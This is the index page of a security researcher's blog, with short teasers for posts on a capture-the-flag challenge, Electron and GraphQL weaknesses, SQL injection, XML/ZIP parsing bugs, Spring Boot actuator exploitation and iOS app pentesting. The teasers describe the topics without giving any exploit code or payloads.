spaceraccoon.dev

Introduction: Red Alert!

Last month, the Centre for Strategic Infocomm Technologies (CSIT) invited local cybersecurity enthusiasts to tackle the InfoSecurity Challenge (TISC). The Challenge was organized in a capture-the-flag format, with 6 cybersecurity and programming challenges of increasing difficulty unlocked one after another.

On New Year’s Eve, hackers from the PALINDROME group launched a ransomware attack on a major finance company and encrypted some of its critical data servers. Your mission is to complete a series of tasks to recover as much data as possible to prevent the company from having to give in to PALINDROME's demand. The tasks will increase in difficulty as you go along so be prepared to put up the fight of your life.

With this exciting introduction, I tackled a series of difficult problems that encompassed reverse engineering, binary exploitation, and cryptography. This took me far out of my comfort zone of application security, but since I wanted to build my skills in those areas, it was a welcome challenge.

Read more...

It's Node's World – We Just Live In It

For better or worse, Node.js has rocketed up the developer popularity charts. Thanks to frameworks like React, React Native, and Electron, developers can easily build clients for mobile and native platforms. These clients are delivered in what are essentially thin wrappers around a single JavaScript file.

As with any modern convenience, there are tradeoffs. On the security side of things, moving routing and templating logic to the client side makes it easier for attackers to discover unused API endpoints, unobfuscated secrets, and more. Check out Webpack Exploder, a tool I wrote that decompiles Webpacked React applications into their original source code.

For native desktop applications, Electron applications are even easier to decompile and debug. Instead of wading through Ghidra/Radare2/Ida and heaps of assembly code, attackers can use Electron's built-in Chromium DevTools. Meanwhile, Electron's documentation recommends packaging applications into asar archives, a tar-like format that can be unpacked with a simple one-liner.

With the source code, attackers can search for client-side vulnerabilities and escalate them to code execution. No funky buffer overflows needed – Electron's nodeIntegration setting puts applications one XSS away from popping calc.

Read more...

This article was originally posted on my company's Medium blog. If you'd like to support me, give a clap and follow my Medium profile!

Introduction

GraphQL is a modern query language for Application Programming Interfaces (APIs). Supported by Facebook and the GraphQL Foundation, GraphQL grew quickly and has entered the early majority phase of the technology adoption cycle, with major industry players like Shopify, GitHub and Amazon coming on board.

Innovation Adoption Lifecycle

As with the rise of any new technology, using GraphQL came with growing pains, especially for developers who were implementing GraphQL for the first time. While GraphQL promised greater flexibility and power over traditional REST APIs, GraphQL could potentially increase the attack surface for access control vulnerabilities. Developers should look out for these issues when implementing GraphQL APIs and rely on secure defaults in production. At the same time, security researchers should pay attention to these weak spots when testing GraphQL APIs for vulnerabilities.

Read more...

Motivation

Despite the increased adoption of Object-Relational Mapping (ORM) libraries and prepared SQL statements, SQL injections continue to turn up in modern applications. Even ORM libraries have introduced SQL injections due to mistakes in translating object mappings to raw SQL statements. Of course, legacy applications and dangerous development practices also contribute to SQL injection vulnerabilities.

Initially, I faced difficulties identifying SQL injections. Unlike another common vulnerability class, Cross-Site Scripting (XSS), endpoints vulnerable to SQL injections usually don't provide feedback on where and how you're injecting into the SQL statement. For XSS, it's simple: with the exception of Blind XSS (where the XSS ends up in an admin panel or somewhere you don't have access to), you always see where your payload ends up in the HTML response.

Read more...

XML and ZIP – A Tale as Old As Time

While researching a bug bounty target, I came across a web application that processed a custom file type. Let's call it .xyz. A quick Google search revealed that the .xyz file type is actually just a ZIP file that contains an XML file and additional media assets. The XML file functions as a manifest to describe the contents of the package.

This is an extremely common way of packaging custom file types. For example, if you try to unzip a Microsoft Word file with unzip Document.docx, you would get:

Archive:  Document.docx
  inflating: [Content_Types].xml     
  inflating: _rels/.rels             
  inflating: word/_rels/document.xml.rels  
  inflating: word/document.xml       
  inflating: word/theme/theme1.xml   
  inflating: word/settings.xml       
  inflating: docProps/core.xml       
  inflating: word/fontTable.xml      
  inflating: word/webSettings.xml    
  inflating: word/styles.xml         
  inflating: docProps/app.xml        

Another well-known example of this pattern is the .apk Android app file, which is essentially a ZIP file that contains an AndroidManifest.xml manifest file and other assets.

However, if handled naively, this packaging pattern creates additional security issues. These “vulnerabilities” are actually features built into the XML and ZIP formats. Responsibility falls onto XML and ZIP parsers to handle these features safely. Unfortunately, this rarely happens, especially when developers simply use the default settings.

Read more...

Prelude

The Spring Boot framework is one of the most popular Java-based microservice frameworks that helps developers quickly and easily deploy Java applications. With its focus on developer-friendly tools and configurations, Spring Boot accelerates the development process.

However, these development defaults can become dangerous in the hands of inexperienced developers. My write-up expands on the work of Michal Stepankin, who researched ways to exploit exposed actuators in Spring Boot 1.x and achieve RCE via deserialization. I provide an updated RCE method via Spring Boot 2.x's default HikariCP database connection pool and a common Java development database, the H2 Database Engine. I also created a sample Spring Boot application based on Spring Boot's default tutorial application to demonstrate the exploit.

Read more...

Motivation

Diving straight into reverse-engineering iOS apps can be daunting and time-consuming. While wading into the binary can pay off greatly in the long run, it's also useful to start off with the easy wins, especially when you have limited time and resources. One such easy win is hunting login credentials and API keys in iOS applications.

Most iOS applications use third-party APIs and SDKs such as Twitter, Amazon Web Services, and so on. Interacting with these APIs require API keys which are used (and thus stored) in the app itself. A careless developer could easily leak keys with too many privileges or keys that were never meant to be stored on the client-side in the first place.

What makes finding them an easy win? As described by top iOS developer Mattt Thompson:

There’s no way to secure secrets stored on the client. Once someone can run your software on their own device, it’s game over.

And maintaining a secure, closed communications channel between client and server incurs an immense amount of operational complexity — assuming it’s possible in the first place.

He also tells us that:

Another paper published in 2018 found SDK credential misuse in 68 out of a sample of 100 popular iOS apps. (Wen, Li, Zhang, & Gu, 2018)

Until APIs and developers come round to the fact that client secrets are insecure by design, there will always be these low-hanging vulnerabilities in iOS apps.

Read more...

Updated April 19, 2020: – Install OpenSSH through Cydia (ramsexy) – Checkra1n now supports Linux (inhibitor181) – Use a USB Type-A cable instead of Type-C (c0rv4x)

Updated April 26, 2020: – Linux-specific instructions (inhibitor181)

Updated August 14, 2020: – Burp TLS v1.3 configuration

Motivation

I wanted to get into mobile app pentesting. While it's relatively easy to get started on Android, it's harder to do so with iOS. For example, while Android has Android Virtual Device and a host of other third-party emulators, iOS only has a Xcode's iOS Simulator, which mimics the software environment of an iPhone and not the hardware. As such, iOS app pentesting requires an actual OS device.

Moreover, it's a major hassle to do even basic things like bypassing SSL certificate pinning. Portswigger's Burp Suite Mobile Assistant needs to be installed onto a jailbroken device and only works on iOS 9 and below.

For the longest time, iOS pentesting guides recommended buying an old iPhone with deprecated iOS versions off eBay. More recent efforts like Yogendra Jaiswal's excellent guide are based on the Unc0ver jailbreak, which works on iOS 11.0-12.4. If you don't have an iDevice in that range, you're out of luck.

Fortunately, with the release off the checkra1n jailbreak, A5-A11 iPhone, iPad and iPods on the latest iOS can now be jailbroken. Many iOS app pentesting tools, having lain dormant during the long winter of jailbreaking, are now catching up and new tools are also being released.

As such, I'm writing quickstart guide for iOS app pentesting on modern devices with the checkra1n jailbreak and consolidating different tools' setup guides in one place. I will follow up with a post on bugs I've found on iOS apps using the tools installed here.

Read more...

Enter your email to subscribe to updates.